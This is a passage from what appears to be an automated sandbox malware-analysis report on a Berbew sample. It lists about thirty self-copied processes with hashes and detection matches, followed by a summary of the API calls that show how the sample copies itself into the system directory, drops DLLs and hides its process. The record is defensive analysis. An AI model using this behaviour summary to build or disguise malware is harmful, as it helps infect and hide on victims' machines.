                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Berbew, Description: Yara detected Berbew, Source: 00000009.00000002.1986378400.000000000042A000.00000004.00000001.01000000.0000000C.sdmp, Author: Joe Security
                          Reputation:low
                          Has exited:true

                          Target ID:10
                          Start time:19:58:56
                          Start date:30/10/2024
                          Path:C:\Windows\SysWOW64\Ojacofgb.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\system32\Ojacofgb.exe
                          Imagebase:0x400000
                          File size:131'072 bytes
                          MD5 hash:AF41FAF03E8EAED376F154722746385B
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Berbew, Description: Yara detected Berbew, Source: 0000000A.00000002.1986379697.000000000042A000.00000004.00000001.01000000.0000000D.sdmp, Author: Joe Security
                          Reputation:low
                          Has exited:true

                          Target ID:11
                          Start time:19:58:57
                          Start date:30/10/2024
                          Path:C:\Windows\SysWOW64\Ppllkpoo.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\system32\Ppllkpoo.exe
                          Imagebase:0x400000
                          File size:131'072 bytes
                          MD5 hash:38F64F662EE5C7E45202627AA7FCACCC
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Berbew, Description: Yara detected Berbew, Source: 0000000B.00000002.1988867655.000000000042A000.00000004.00000001.01000000.0000000E.sdmp, Author: Joe Security
                          Reputation:low
                          Has exited:true

                          Target ID:12
                          Start time:19:58:57
                          Start date:30/10/2024
                          Path:C:\Windows\SysWOW64\Plbmqa32.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\system32\Plbmqa32.exe
                          Imagebase:0x400000
                          File size:131'072 bytes
                          MD5 hash:40D460D476E3EF9238CDEC233DCA293E
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Berbew, Description: Yara detected Berbew, Source: 0000000C.00000002.1990903099.000000000042A000.00000004.00000001.01000000.0000000F.sdmp, Author: Joe Security
                          Reputation:low
                          Has exited:true

                          Target ID:13
                          Start time:19:58:57
                          Start date:30/10/2024
                          Path:C:\Windows\SysWOW64\Plgflqpn.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\system32\Plgflqpn.exe
                          Imagebase:0x400000
                          File size:131'072 bytes
                          MD5 hash:746D9DB8F43CEAFB79CE4693732F31F4
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Berbew, Description: Yara detected Berbew, Source: 0000000D.00000002.1993494029.000000000042A000.00000004.00000001.01000000.00000010.sdmp, Author: Joe Security
                          Reputation:low
                          Has exited:true

                          Target ID:14
                          Start time:19:58:57
                          Start date:30/10/2024
                          Path:C:\Windows\SysWOW64\Pqeoao32.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\system32\Pqeoao32.exe
                          Imagebase:0x400000
                          File size:131'072 bytes
                          MD5 hash:A195A0011B7154E41E7FCDE5D8B4E0CA
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Berbew, Description: Yara detected Berbew, Source: 0000000E.00000002.1998469389.000000000042A000.00000004.00000001.01000000.00000011.sdmp, Author: Joe Security
                          Reputation:low
                          Has exited:true

                          Target ID:15
                          Start time:19:58:57
                          Start date:30/10/2024
                          Path:C:\Windows\SysWOW64\Qgcpihjl.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\system32\Qgcpihjl.exe
                          Imagebase:0x400000
                          File size:131'072 bytes
                          MD5 hash:B46EDD174CAE8D3583851F8A26241E40
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Berbew, Description: Yara detected Berbew, Source: 0000000F.00000002.2000063573.000000000042A000.00000004.00000001.01000000.00000012.sdmp, Author: Joe Security
                          Reputation:low
                          Has exited:true

                          Target ID:16
                          Start time:19:58:58
                          Start date:30/10/2024
                          Path:C:\Windows\SysWOW64\Ajkolbad.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\system32\Ajkolbad.exe
                          Imagebase:0x400000
                          File size:131'072 bytes
                          MD5 hash:9A076EA5029217C545E15BC92444072D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Berbew, Description: Yara detected Berbew, Source: 00000010.00000002.2000741077.000000000042A000.00000004.00000001.01000000.00000013.sdmp, Author: Joe Security
                          Antivirus matches:
                          • Detection: 100%, Avira
                          • Detection: 100%, Joe Sandbox ML
                          Reputation:low
                          Has exited:true

                          Target ID:17
                          Start time:19:58:58
                          Start date:30/10/2024
                          Path:C:\Windows\SysWOW64\Bmlhnnne.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\system32\Bmlhnnne.exe
                          Imagebase:0x400000
                          File size:131'072 bytes
                          MD5 hash:A98CEA1775884370D8699936D1B8E227
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Berbew, Description: Yara detected Berbew, Source: 00000011.00000002.2001790871.000000000042A000.00000004.00000001.01000000.00000014.sdmp, Author: Joe Security
                          Antivirus matches:
                          • Detection: 100%, Avira
                          • Detection: 100%, Joe Sandbox ML
                          Reputation:low
                          Has exited:true

                          Target ID:18
                          Start time:19:58:58
                          Start date:30/10/2024
                          Path:C:\Windows\SysWOW64\Bgamkfnl.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\system32\Bgamkfnl.exe
                          Imagebase:0x400000
                          File size:131'072 bytes
                          MD5 hash:2DAF6E68C4322E5ABD5103F013110A0D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Berbew, Description: Yara detected Berbew, Source: 00000012.00000002.2002333377.000000000042A000.00000004.00000001.01000000.00000015.sdmp, Author: Joe Security
                          Antivirus matches:
                          • Detection: 100%, Avira
                          • Detection: 100%, Joe Sandbox ML
                          Reputation:low
                          Has exited:true

                          Target ID:19
                          Start time:19:58:58
                          Start date:30/10/2024
                          Path:C:\Windows\SysWOW64\Bqjacldl.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\system32\Bqjacldl.exe
                          Imagebase:0x400000
                          File size:131'072 bytes
                          MD5 hash:D92B3B389B0B969DCC1638C63737002A
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Berbew, Description: Yara detected Berbew, Source: 00000013.00000002.2003694218.000000000042A000.00000004.00000001.01000000.00000016.sdmp, Author: Joe Security
                          Antivirus matches:
                          • Detection: 100%, Avira
                          • Detection: 100%, Joe Sandbox ML
                          Reputation:low
                          Has exited:true

                          Target ID:20
                          Start time:19:58:58
                          Start date:30/10/2024
                          Path:C:\Windows\SysWOW64\Bnnampcf.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\system32\Bnnampcf.exe
                          Imagebase:0x400000
                          File size:131'072 bytes
                          MD5 hash:F015A56D85709788B392A68459FEB024
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Berbew, Description: Yara detected Berbew, Source: 00000014.00000002.2004277931.000000000042A000.00000004.00000001.01000000.00000017.sdmp, Author: Joe Security
                          Antivirus matches:
                          • Detection: 100%, Avira
                          • Detection: 100%, Joe Sandbox ML
                          Reputation:low
                          Has exited:true

                          Target ID:21
                          Start time:19:58:58
                          Start date:30/10/2024
                          Path:C:\Windows\SysWOW64\Bnpnbp32.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\system32\Bnpnbp32.exe
                          Imagebase:0x400000
                          File size:131'072 bytes
                          MD5 hash:7E024C6EF36928FEE4659AE588ED4D43
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Berbew, Description: Yara detected Berbew, Source: 00000015.00000002.2005214969.000000000042A000.00000004.00000001.01000000.00000018.sdmp, Author: Joe Security
                          Antivirus matches:
                          • Detection: 100%, Avira
                          • Detection: 100%, Joe Sandbox ML
                          Reputation:low
                          Has exited:true

                          Target ID:22
                          Start time:19:58:58
                          Start date:30/10/2024
                          Path:C:\Windows\SysWOW64\Bgibkegc.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\system32\Bgibkegc.exe
                          Imagebase:0x400000
                          File size:131'072 bytes
                          MD5 hash:0DBB530A0BE511F3DC794C1024460A99
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Berbew, Description: Yara detected Berbew, Source: 00000016.00000002.2005778309.000000000042A000.00000004.00000001.01000000.00000019.sdmp, Author: Joe Security
                          Antivirus matches:
                          • Detection: 100%, Avira
                          • Detection: 100%, Joe Sandbox ML
                          Reputation:low
                          Has exited:true

                          Target ID:23
                          Start time:19:58:58
                          Start date:30/10/2024
                          Path:C:\Windows\SysWOW64\Baagdk32.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\system32\Baagdk32.exe
                          Imagebase:0x400000
                          File size:131'072 bytes
                          MD5 hash:1F4BBF60BA2126DD626006EB2F22CA9D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Berbew, Description: Yara detected Berbew, Source: 00000017.00000002.2006552400.000000000042A000.00000004.00000001.01000000.0000001A.sdmp, Author: Joe Security
                          Antivirus matches:
                          • Detection: 100%, Avira
                          • Detection: 100%, Joe Sandbox ML
                          Reputation:low
                          Has exited:true

                          Target ID:24
                          Start time:19:58:59
                          Start date:30/10/2024
                          Path:C:\Windows\SysWOW64\Cfnpmb32.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\system32\Cfnpmb32.exe
                          Imagebase:0x400000
                          File size:131'072 bytes
                          MD5 hash:3E45EB0DFCF7ACE28698143C3D650109
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Berbew, Description: Yara detected Berbew, Source: 00000018.00000002.2007866947.000000000042A000.00000004.00000001.01000000.0000001B.sdmp, Author: Joe Security
                          Antivirus matches:
                          • Detection: 100%, Avira
                          • Detection: 100%, Joe Sandbox ML
                          Reputation:low
                          Has exited:true

                          Target ID:25
                          Start time:19:58:59
                          Start date:30/10/2024
                          Path:C:\Windows\SysWOW64\Ccapffke.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\system32\Ccapffke.exe
                          Imagebase:0x400000
                          File size:131'072 bytes
                          MD5 hash:713B5E4D81DBB20F5D48D2BC5501A007
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Berbew, Description: Yara detected Berbew, Source: 00000019.00000002.2008521888.000000000042A000.00000004.00000001.01000000.0000001C.sdmp, Author: Joe Security
                          Antivirus matches:
                          • Detection: 100%, Avira
                          • Detection: 100%, Joe Sandbox ML
                          Reputation:low
                          Has exited:true

                          Target ID:26
                          Start time:19:58:59
                          Start date:30/10/2024
                          Path:C:\Windows\SysWOW64\Ceampi32.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\system32\Ceampi32.exe
                          Imagebase:0x400000
                          File size:131'072 bytes
                          MD5 hash:7008B57588331F2C9C3672BB96521844
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Berbew, Description: Yara detected Berbew, Source: 0000001A.00000002.2011076811.000000000042A000.00000004.00000001.01000000.0000001D.sdmp, Author: Joe Security
                          Antivirus matches:
                          • Detection: 100%, Avira
                          • Detection: 100%, Joe Sandbox ML
                          Reputation:low
                          Has exited:true

                          Target ID:27
                          Start time:19:58:59
                          Start date:30/10/2024
                          Path:C:\Windows\SysWOW64\Cnjaioih.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\system32\Cnjaioih.exe
                          Imagebase:0x400000
                          File size:131'072 bytes
                          MD5 hash:CA30D43E91B9417EA485DABDD1CCD228
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Berbew, Description: Yara detected Berbew, Source: 0000001B.00000002.2013905191.000000000042A000.00000004.00000001.01000000.0000001E.sdmp, Author: Joe Security
                          Antivirus matches:
                          • Detection: 100%, Avira
                          • Detection: 100%, Joe Sandbox ML
                          Reputation:low
                          Has exited:true

                          Target ID:28
                          Start time:19:58:59
                          Start date:30/10/2024
                          Path:C:\Windows\SysWOW64\Camgpi32.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\system32\Camgpi32.exe
                          Imagebase:0x400000
                          File size:131'072 bytes
                          MD5 hash:AFB7FE6A2325DC169AF337B02D73EA13
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Berbew, Description: Yara detected Berbew, Source: 0000001C.00000002.2016533194.000000000042A000.00000004.00000001.01000000.0000001F.sdmp, Author: Joe Security
                          Antivirus matches:
                          • Detection: 100%, Avira
                          • Detection: 100%, Joe Sandbox ML
                          Reputation:low
                          Has exited:true

                          Target ID:29
                          Start time:19:58:59
                          Start date:30/10/2024
                          Path:C:\Windows\SysWOW64\Dmfdkj32.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\system32\Dmfdkj32.exe
                          Imagebase:0x400000
                          File size:131'072 bytes
                          MD5 hash:8A37BEE9F75CA0545946D3034A19B27A
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Berbew, Description: Yara detected Berbew, Source: 0000001D.00000002.2017016443.000000000042A000.00000004.00000001.01000000.00000020.sdmp, Author: Joe Security
                          Antivirus matches:
                          • Detection: 100%, Avira
                          • Detection: 100%, Joe Sandbox ML
                          Reputation:low
                          Has exited:true

                          Target ID:30
                          Start time:19:59:00
                          Start date:30/10/2024
                          Path:C:\Windows\SysWOW64\Dnhmjm32.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\system32\Dnhmjm32.exe
                          Imagebase:0x400000
                          File size:131'072 bytes
                          MD5 hash:305D22424B3635688BD806671F6F8A9C
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Berbew, Description: Yara detected Berbew, Source: 0000001E.00000002.2018453034.000000000042A000.00000004.00000001.01000000.00000021.sdmp, Author: Joe Security
                          Antivirus matches:
                          • Detection: 100%, Avira
                          • Detection: 100%, Joe Sandbox ML
                          Reputation:low
                          Has exited:true

                          Target ID:31
                          Start time:19:59:00
                          Start date:30/10/2024
                          Path:C:\Windows\SysWOW64\Dfcboo32.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\system32\Dfcboo32.exe
                          Imagebase:0x400000
                          File size:131'072 bytes
                          MD5 hash:E467DF0B06CAE41308F8F0A6E1F35FBA
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Berbew, Description: Yara detected Berbew, Source: 0000001F.00000002.2019406612.000000000042A000.00000004.00000001.01000000.00000022.sdmp, Author: Joe Security
                          Antivirus matches:
                          • Detection: 100%, Avira
                          • Detection: 100%, Joe Sandbox ML
                          Reputation:low
                          Has exited:true

                          Target ID:32
                          Start time:19:59:00
                          Start date:30/10/2024
                          Path:C:\Windows\SysWOW64\Edgbhcim.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\system32\Edgbhcim.exe
                          Imagebase:0x400000
                          File size:131'072 bytes
                          MD5 hash:4396DFC06DB43385A7F834F79F6CA36B
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Berbew, Description: Yara detected Berbew, Source: 00000020.00000002.2019682823.000000000042A000.00000004.00000001.01000000.00000023.sdmp, Author: Joe Security
                          Antivirus matches:
                          • Detection: 100%, Avira
                          • Detection: 100%, Joe Sandbox ML
                          Reputation:low
                          Has exited:true

                          Target ID:33
                          Start time:19:59:00
                          Start date:30/10/2024
                          Path:C:\Windows\SysWOW64\Emogai32.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\system32\Emogai32.exe
                          Imagebase:0x400000
                          File size:131'072 bytes
                          MD5 hash:E5B571BCF3D5D371B03E73AAAE92245B
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Berbew, Description: Yara detected Berbew, Source: 00000021.00000002.2021263243.000000000042A000.00000004.00000001.01000000.00000024.sdmp, Author: Joe Security
                          Antivirus matches:
                          • Detection: 100%, Avira
                          • Detection: 100%, Joe Sandbox ML
                          Reputation:low
                          Has exited:true

                          Target ID:34
                          Start time:19:59:00
                          Start date:30/10/2024
                          Path:C:\Windows\SysWOW64\Efgkjnfn.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\system32\Efgkjnfn.exe
                          Imagebase:0x400000
                          File size:131'072 bytes
                          MD5 hash:B024F2548F4F6ADC9F3DCD68E53CB2CC
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Berbew, Description: Yara detected Berbew, Source: 00000022.00000002.2022377114.000000000042A000.00000004.00000001.01000000.00000025.sdmp, Author: Joe Security
                          Antivirus matches:
                          • Detection: 100%, Avira
                          • Detection: 100%, Joe Sandbox ML
                          Reputation:low
                          Has exited:true

                          Target ID:35
                          Start time:19:59:00
                          Start date:30/10/2024
                          Path:C:\Windows\SysWOW64\Eoappk32.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\system32\Eoappk32.exe
                          Imagebase:0x400000
                          File size:131'072 bytes
                          MD5 hash:B8C0A2511B4FA693AE579E90FCE526AD
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Berbew, Description: Yara detected Berbew, Source: 00000023.00000002.2027822384.000000000042A000.00000004.00000001.01000000.00000026.sdmp, Author: Joe Security
                          Antivirus matches:
                          • Detection: 100%, Avira
                          • Detection: 100%, Joe Sandbox ML
                          Reputation:low
                          Has exited:true

                          Target ID:36
                          Start time:19:59:01
                          Start date:30/10/2024
                          Path:C:\Windows\SysWOW64\Fkogfkdj.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\system32\Fkogfkdj.exe
                          Imagebase:0x400000
                          File size:131'072 bytes
                          MD5 hash:151422544613301F6704413C52E381B0
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Berbew, Description: Yara detected Berbew, Source: 00000024.00000002.2029071325.000000000042A000.00000004.00000001.01000000.00000027.sdmp, Author: Joe Security
                          Reputation:low
                          Has exited:true

                          Target ID:37
                          Start time:19:59:01
                          Start date:30/10/2024
                          Path:C:\Windows\SysWOW64\Fhedeo32.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\system32\Fhedeo32.exe
                          Imagebase:0x400000
                          File size:131'072 bytes
                          MD5 hash:03114EFDB305B36B603B7F89B84FE057
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Berbew, Description: Yara detected Berbew, Source: 00000025.00000002.2029721811.000000000042A000.00000004.00000001.01000000.00000028.sdmp, Author: Joe Security
                          Reputation:low
                          Has exited:true

                          Target ID:38
                          Start time:19:59:01
                          Start date:30/10/2024
                          Path:C:\Windows\SysWOW64\Feidnc32.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\system32\Feidnc32.exe
                          Imagebase:0x400000
                          File size:131'072 bytes
                          MD5 hash:635F3B50D2C2626B8575FD1AD6A4CE99
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Berbew, Description: Yara detected Berbew, Source: 00000026.00000002.2030625851.000000000042A000.00000004.00000001.01000000.00000029.sdmp, Author: Joe Security
                          Reputation:low
                          Has exited:true

                          Target ID:39
                          Start time:19:59:01
                          Start date:30/10/2024
                          Path:C:\Windows\SysWOW64\Foaigifk.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\system32\Foaigifk.exe
                          Imagebase:0x400000
                          File size:131'072 bytes
                          MD5 hash:1FC2CFC732D1C3E7577F946BB2663E80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Berbew, Description: Yara detected Berbew, Source: 00000027.00000002.2031051927.000000000042A000.00000004.00000001.01000000.0000002A.sdmp, Author: Joe Security
                          Reputation:low
                          Has exited:true


                            Execution Graph

                            Execution Coverage:5.4%
                            Dynamic/Decrypted Code Coverage:0%
                            Signature Coverage:20.1%
                            Total number of Nodes:542
                            Total number of Limit Nodes:2

                            Control-flow Graph

                            APIs
                            • OpenMutexA.KERNEL32(001F0001,00000000,QueenKarton_12), ref: 00406C50
                            • CloseHandle.KERNEL32(00000000,00000000), ref: 00406C60
                            • exit.CRTDLL(00000001,00000000,00000000), ref: 00406C67
                            • GetVersionExA.KERNEL32(00418D50,00000000), ref: 00406C8A
                            • GetSystemDirectoryA.KERNEL32(00429080,000000FF), ref: 00406C99
                            • GetTickCount.KERNEL32 ref: 00406C9E
                            • srand.CRTDLL(00000000,00418D50,00000000), ref: 00406CA4
                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,00418D50,00000000), ref: 00406CBE
                            • rand.CRTDLL(00418D50,00000000), ref: 00406D03
                            • rand.CRTDLL(00418D50,00000000), ref: 00406D2F
                            • rand.CRTDLL(00418D50,00000000), ref: 00406D70
                            • sprintf.CRTDLL(?,%s\%s.exe,00429080,?,00418D50,00000000), ref: 00406DA8
                            • CopyFileA.KERNEL32(?,?,00000000), ref: 00406DBD
                            • WinExec.KERNEL32(?,00000000), ref: 00406DEC
                            • ExitProcess.KERNEL32(00000001,?,?,?,?,?,?,00418D50,00000000), ref: 00406E02
                            • sprintf.CRTDLL(00418E30,%s\%s,00429080,kkq32.dll,00418D50,00000000), ref: 00406E1B
                            • sprintf.CRTDLL(00428F60,%s\%s,00429080,kkq32.vxd,00418E30,%s\%s,00429080,kkq32.dll,00418D50,00000000), ref: 00406E3A
                            • sprintf.CRTDLL(00408020,%s\%s,00429080,dnkkq.dll,00428F60,%s\%s,00429080,kkq32.vxd,00418E30,%s\%s,00429080,kkq32.dll,00418D50,00000000), ref: 00406E53
                            • LoadCursorA.USER32(00000000,00007F00), ref: 00406E85
                            • LoadIconA.USER32(00000000,00007F03), ref: 00406E9A
                            • GetStockObject.GDI32(00000000), ref: 00406EA8
                            • RegisterClassA.USER32(00000003), ref: 00406EC9
                            • CreateWindowExA.USER32(00000000,QueenKarton,QueenKarton,00CA0000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00408020), ref: 00406EF3
                            • CreateMutexA.KERNEL32(00000000,00000000,QueenKarton_12,%s\%s,00429080,dnkkq.dll,00428F60,%s\%s,00429080,kkq32.vxd,00418E30,%s\%s,00429080,kkq32.dll,00418D50,00000000), ref: 00406F12
                              • Part of subcall function 00402E06: GetVersion.KERNEL32 ref: 00402E22
                              • Part of subcall function 00402E06: GlobalMemoryStatus.KERNEL32(?), ref: 00402F9F
                              • Part of subcall function 00402E06: CloseHandle.KERNEL32(?), ref: 00403065
                            • GetVersion.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00429080,kkq32.dll,00418D50,00000000), ref: 00406F21
                            • GetModuleHandleA.KERNEL32(kernel32.dll,?,?,?,?,?,?,?,?,?,?,?,00429080,kkq32.dll,00418D50,00000000), ref: 00406F32
                            • GetProcAddress.KERNEL32(00000000,RegisterServiceProcess), ref: 00406F3D
                            • GetCurrentProcessId.KERNEL32(00000000,RegisterServiceProcess,kernel32.dll,?,?,?,?,?,?,?,?,?,?,?,00429080,kkq32.dll), ref: 00406F57
                            • CreateThread.KERNEL32(00000000,00000000,0040682B,00000000,00000000,?), ref: 00406F84
                            • CloseHandle.KERNEL32(00000000,00000000,00000000,0040682B,00000000,00000000,?), ref: 00406F8A
                            • CreateThread.KERNEL32(00000000,00000000,004068B0,00000000,00000000,?), ref: 00406FA3
                            • CloseHandle.KERNEL32(00000000,00000000,00000000,004068B0,00000000,00000000,?,00000000,00000000,00000000,0040682B,00000000,00000000,?), ref: 00406FA9
                            • SetTimer.USER32(00000001,000001F4,00000000,00000000), ref: 00406FBD
                            • TranslateMessage.USER32(?), ref: 00406FC8
                            • DispatchMessageA.USER32(?), ref: 00406FD7
                            • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00406FE6
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1981203140.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1981163808.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1981272347.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1981310007.000000000042E000.00000020.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1981338899.000000000042F000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1981401700.0000000000436000.00000020.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1981476275.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_h879iieoae.jbxd
                            Yara matches
                            Similarity
                            • API ID: Handle$CloseCreatesprintf$MessageVersionrand$FileLoadModuleMutexProcessThread$AddressClassCopyCountCurrentCursorDirectoryDispatchExecExitGlobalIconMemoryNameObjectOpenProcRegisterStatusStockSystemTickTimerTranslateWindowexitsrand
                            • String ID: %s\%s$%s\%s.exe$2$3$QueenKarton$QueenKarton_12$RegisterServiceProcess$dnkkq.dll$kernel32.dll$kkq32.dll$kkq32.vxd
                            • API String ID: 607501245-2841515530
                            • Opcode ID: 47dc35882da9e6d4dfe293ecc6690f52e81bb2b6ce91e07ac91a2883a2b15265
                            • Instruction ID: b1e00ee85c63859ee3f052cf9651ba5d7fc827d99c5bd6e2bd8f21b679fb6b98
                            • Opcode Fuzzy Hash: 47dc35882da9e6d4dfe293ecc6690f52e81bb2b6ce91e07ac91a2883a2b15265
                            • Instruction Fuzzy Hash: E691C671F883286ADB10A7759C46FDD76A85B44704F5000BBB508FB2C2D6FC6D448BAE

                            Control-flow Graph

                            control_flow_graph 60 403619-40364c CreateFileA 61 403664-403682 GetFileSize LocalAlloc 60->61 62 40364e-403652 60->62 63 403684-40368a 61->63 64 40368c-40368f 61->64 65 403654-403657 62->65 66 40365a-40365c 62->66 67 403692-4036ab ReadFile CloseHandle 63->67 64->67 65->66 66->61 68 4036ae-4036b2 66->68 67->68
                            APIs
                            • CreateFileA.KERNEL32(69D4CE72,80000000,?,00000000,?,00000080,00000000,00000001,297D5A2B,10624DD3,00000001,69D4CE72,10624DD3), ref: 00403642
                            • GetFileSize.KERNEL32(00000000,00000000,69D4CE72,80000000,?,00000000,?,00000080,00000000,00000001,297D5A2B,10624DD3,00000001,69D4CE72,10624DD3), ref: 00403667
                            • LocalAlloc.KERNEL32(00000040,-00000010,00000000,00000000,69D4CE72,80000000,?,00000000,?,00000080,00000000,00000001,297D5A2B,10624DD3,00000001,69D4CE72), ref: 00403674
                            • ReadFile.KERNEL32(00000000,10624DD3,00000000,00000000,00000000,00000040,-00000010,00000000,00000000,69D4CE72,80000000,?,00000000,?,00000080,00000000), ref: 0040369A
                            • CloseHandle.KERNEL32(00000000,00000000,10624DD3,00000000,00000000,00000000,00000040,-00000010,00000000,00000000,69D4CE72,80000000,?,00000000,?,00000080), ref: 004036A6
                            Memory Dump Source
                            • Source File: 00000000.00000002.1981203140.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1981163808.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1981272347.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1981310007.000000000042E000.00000020.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1981338899.000000000042F000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1981401700.0000000000436000.00000020.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1981476275.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_h879iieoae.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$AllocCloseCreateHandleLocalReadSize
                            • String ID:
                            • API String ID: 2632956699-0
                            • Opcode ID: dd1227ad1f3452ee8fc35f5791aff0d34791abb0994a93554c87423cd4fa6a6f
                            • Instruction ID: fb77f57afc793f1fdbd914af7197191687e2a95eac13cef646675694312e246c
